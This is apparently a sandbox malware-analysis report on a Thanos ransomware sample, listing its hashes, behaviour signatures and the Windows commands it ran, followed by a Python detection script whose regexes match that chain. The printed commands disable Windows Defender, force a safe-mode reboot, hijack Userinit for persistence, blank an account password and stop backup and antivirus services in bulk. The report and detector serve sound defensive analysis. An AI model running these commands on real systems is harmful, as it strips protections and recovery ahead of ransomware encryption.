Analysis

  • max time kernel
    3s
  • max time network
    2s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28-05-2021 09:57

General

  • Target

    b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe

  • Size

    393KB

  • MD5

    104b68a8b7e2913139049b30847f990f

  • SHA1

    0f25791a039298be94a3d024f5a3d1796e13a587

  • SHA256

    b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424

  • SHA512

    cba38f93247621cc38ea33f72efc1147e0a6d1a8b9256a26853ac3c1c8c3c9444d2d3a5af586e934febad1822c93fbc1e9c538759b4587720ba03a92792ce04d

Malware Config

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Thanos Ransomware

    Ransomware-as-a-service (RaaS) sold through underground forums.

  • Thanos executable 2 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Users\Admin\AppData\Local\Temp\file.exe
      "file.exe"
      2⤵
      • Executes dropped EXE
      • Windows security modification
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\system32\reg.exe
        "reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
        3⤵
        • Modifies registry key
        PID:1344
      • C:\Windows\system32\bcdedit.exe
        "bcdedit.exe" /set {default} safeboot network
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1364
      • C:\Windows\system32\reg.exe
        "reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\file.exe","C:\Windows\system32\userinit.exe" /f
        3⤵
        • Modifies WinLogon for persistence
        PID:612
      • C:\Windows\system32\net.exe
        "net.exe" user Admin ""
        3⤵
        PID:1944
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user Admin ""
          4⤵
          PID:1660
      • C:\Windows\system32\shutdown.exe
        "shutdown.exe" /r /t 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        3⤵
        PID:1528
      • C:\Windows\system32\net.exe
        "net.exe" stop mfewc /y
        3⤵
        PID:1644
      • C:\Windows\system32\net.exe
        "net.exe" stop NetBackup BMR MTFTP Service /y
        3⤵
        PID:1740
      • C:\Windows\system32\net.exe
        "net.exe" stop VeeamDeploymentService /y
        3⤵
        PID:1576
      • C:\Windows\system32\net.exe
        "net.exe" stop VeeamTransportSvc /y
        3⤵
        PID:328
      • C:\Windows\system32\net.exe
        "net.exe" stop VSNAPVSS /y
        3⤵
        PID:1792
      • C:\Windows\system32\net.exe
        "net.exe" stop stc_raw_agent /y
        3⤵
        PID:1820
      • C:\Windows\system32\net.exe
        "net.exe" stop zhudongfangyu /y
        3⤵
        PID:1756
      • C:\Windows\system32\net.exe
        "net.exe" stop YooIT /y
        3⤵
        PID:1928
      • C:\Windows\system32\net.exe
        "net.exe" stop YooBackup /y
        3⤵
        PID:1984
      • C:\Windows\system32\net.exe
        "net.exe" stop QBCFMonitorService /y
        3⤵
        PID:1380
      • C:\Windows\system32\net.exe
        "net.exe" stop Intuit.QuickBooks.FCS /y
        3⤵
        PID:1208
      • C:\Windows\system32\net.exe
        "net.exe" stop QBIDPService /y
        3⤵
        PID:480
      • C:\Windows\system32\net.exe
        "net.exe" stop QBFCService /y
        3⤵
        PID:916
      • C:\Windows\system32\net.exe
        "net.exe" stop RTVscan /y
        3⤵
        PID:960
      • C:\Windows\system32\net.exe
        "net.exe" stop SavRoam /y
        3⤵
        PID:812
      • C:\Windows\system32\net.exe
        "net.exe" stop ccSetMgr /y
        3⤵
        PID:1192
      • C:\Windows\system32\net.exe
        "net.exe" stop ccEvtMgr /y
        3⤵
        PID:1488
      • C:\Windows\system32\net.exe
        "net.exe" stop DefWatch /y
        3⤵
        PID:580
      • C:\Windows\system32\net.exe
        "net.exe" stop BMR Boot Service /y
        3⤵
        PID:1316
      • C:\Windows\system32\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        3⤵
        PID:1652
      • C:\Windows\system32\net.exe
        "net.exe" stop avpsus /y
        3⤵
        PID:1076
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
    PID:1772
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "188095522-175523635295267694-1013923470-2110761987932423451-1786827165-40800582"
    1⤵
    PID:1344
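The process tree above is a compact recovery-inhibition chain driven from the dropped file.exe (PID 1152): Windows Defender is removed from the SafeBoot service list, a safe-mode-with-networking reboot is queued with bcdedit, Userinit is hijacked so file.exe relaunches at logon, the local account's password is blanked, and backup and AV services are stopped in bulk before the forced reboot. The following detection logic is an added example and is not part of the sandbox report or of any vendor's product; it models process-creation events as (pid, parent_pid, command_line) tuples, which is an assumption about the log source, and runs over sample events constructed from the report's own command lines plus two benign control events from a hypothetical admin session (parent PID 900) to show that a single service stop or the stock Userinit value does not fire.

```python
"""Detect the recovery-inhibition chain seen in the process tree above: Defender removed
from the SafeBoot service list, a safe-mode reboot queued with bcdedit, Userinit hijacked
for logon persistence, a blank password set on a local account, and backup/AV services
stopped in bulk from one parent process.

Added example, not part of the sandbox report. Events are modelled as
(pid, parent_pid, command_line) tuples, an assumption about the log source; the sample
events are constructed from the report's command lines plus two benign control events
from a hypothetical admin session (parent PID 900).
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    (1344, 1152, r'"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f'),
    (1364, 1152, r'"bcdedit.exe" /set {default} safeboot network'),
    (612, 1152, r'"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\file.exe","C:\Windows\system32\userinit.exe" /f'),
    (1944, 1152, r'"net.exe" user Admin ""'),
    (1524, 1152, r'"shutdown.exe" /r /t 0'),
    (1528, 1152, r'"powershell" Get-MpPreference -verbose'),
    (1644, 1152, r'"net.exe" stop mfewc /y'),
    (1740, 1152, r'"net.exe" stop NetBackup BMR MTFTP Service /y'),
    (1576, 1152, r'"net.exe" stop VeeamDeploymentService /y'),
    (328, 1152, r'"net.exe" stop VeeamTransportSvc /y'),
    (1792, 1152, r'"net.exe" stop VSNAPVSS /y'),
    # Constructed benign controls: one routine service stop and the stock Userinit value.
    (4242, 900, r'"net.exe" stop Spooler /y'),
    (4300, 900, r'"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f'),
]

# reg delete of the WinDefend entry under SafeBoot\Minimal (Defender will not start in safe mode).
SAFEBOOT_DEFENDER_RE = re.compile(r'reg(?:\.exe)?"?\s+delete\s+.*\\SafeBoot\\Minimal\\WinDefend\b', re.I)
# bcdedit /set ... safeboot <minimal|network>: next boot lands in safe mode.
BCDEDIT_SAFEBOOT_RE = re.compile(r'bcdedit(?:\.exe)?"?\s+.*/set\b.*\bsafeboot\b', re.I)
# reg add ...\Winlogon /v Userinit /d <data>; the data is a comma-separated list of launchers.
USERINIT_RE = re.compile(
    r'reg(?:\.exe)?"?\s+add\s+.*\\Winlogon"?\s+/v\s+Userinit\b.*?/d\s+'
    r'(?P<data>"[^"]*"(?:,"[^"]*")*|\S+)', re.I)
# net user <name> "" sets an empty password on the account.
BLANK_PASSWORD_RE = re.compile(r'net(?:1|\.exe)?"?\s+user\s+(?P<user>\S+)\s+""\s*$', re.I)
# net stop <service name, possibly with spaces> [/y]
SERVICE_STOP_RE = re.compile(r'net(?:1|\.exe)?"?\s+stop\s+(?P<svc>.+?)\s*(?:/y)?\s*$', re.I)


def rogue_userinit_entries(data):
    """Return Userinit entries that are not the stock userinit.exe. Assumes the literal
    system32 path as written by the sample; %SystemRoot% forms are not normalised here."""
    entries = [e.strip() for e in data.replace('"', '').split(',') if e.strip()]
    return [e for e in entries if not e.lower().endswith(r'\system32\userinit.exe')]


def analyze(events, stop_threshold=3):
    """Map parent PID -> list of (rule, child_pid, detail) findings."""
    findings = defaultdict(list)
    stops = defaultdict(list)  # parent PID -> [(child pid, service)]
    for pid, ppid, cmd in events:
        if SAFEBOOT_DEFENDER_RE.search(cmd):
            findings[ppid].append(("safeboot_defender_removed", pid, cmd))
        if BCDEDIT_SAFEBOOT_RE.search(cmd):
            findings[ppid].append(("bcdedit_safeboot", pid, cmd))
        m = USERINIT_RE.search(cmd)
        if m:
            rogue = rogue_userinit_entries(m.group("data"))
            if rogue:
                findings[ppid].append(("userinit_hijack", pid, ";".join(rogue)))
        m = BLANK_PASSWORD_RE.search(cmd)
        if m:
            findings[ppid].append(("blank_password_set", pid, m.group("user")))
        m = SERVICE_STOP_RE.search(cmd)
        if m:
            stops[ppid].append((pid, m.group("svc")))
    # A single 'net stop' is routine admin work; a burst from one parent is not.
    for ppid, lst in stops.items():
        if len(lst) >= stop_threshold:
            findings[ppid].append(("mass_service_stop", lst[0][0], ", ".join(s for _, s in lst)))
    return dict(findings)


def chains(findings, min_rules=3):
    """Parent PIDs whose children trip at least min_rules distinct rules: the chain, not one step."""
    return {ppid: sorted({r for r, _, _ in f})
            for ppid, f in findings.items()
            if len({r for r, _, _ in f}) >= min_rules}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for ppid, rules in chains(result).items():
        print(f"parent {ppid}: {', '.join(rules)}")
    for ppid, f in result.items():
        for rule, pid, detail in f:
            print(f"  {ppid} -> {pid}: {rule}: {detail}")
```

Grouping by parent PID is the point: each command on its own is something an administrator might type, but five distinct rules under one parent within seconds, followed by `shutdown /r /t 0`, is the pre-encryption sequence. The same grouping is what makes the benign controls (parent 900) stay silent.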

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1152-73-0x000000001AC80000-0x000000001AC82000-memory.dmp

    Filesize

    8KB

  • memory/1152-63-0x0000000000F00000-0x0000000000F01000-memory.dmp

    Filesize

    4KB

  • memory/1772-70-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

    Filesize

    8KB

  • memory/1772-95-0x0000000002840000-0x0000000002841000-memory.dmp

    Filesize

    4KB
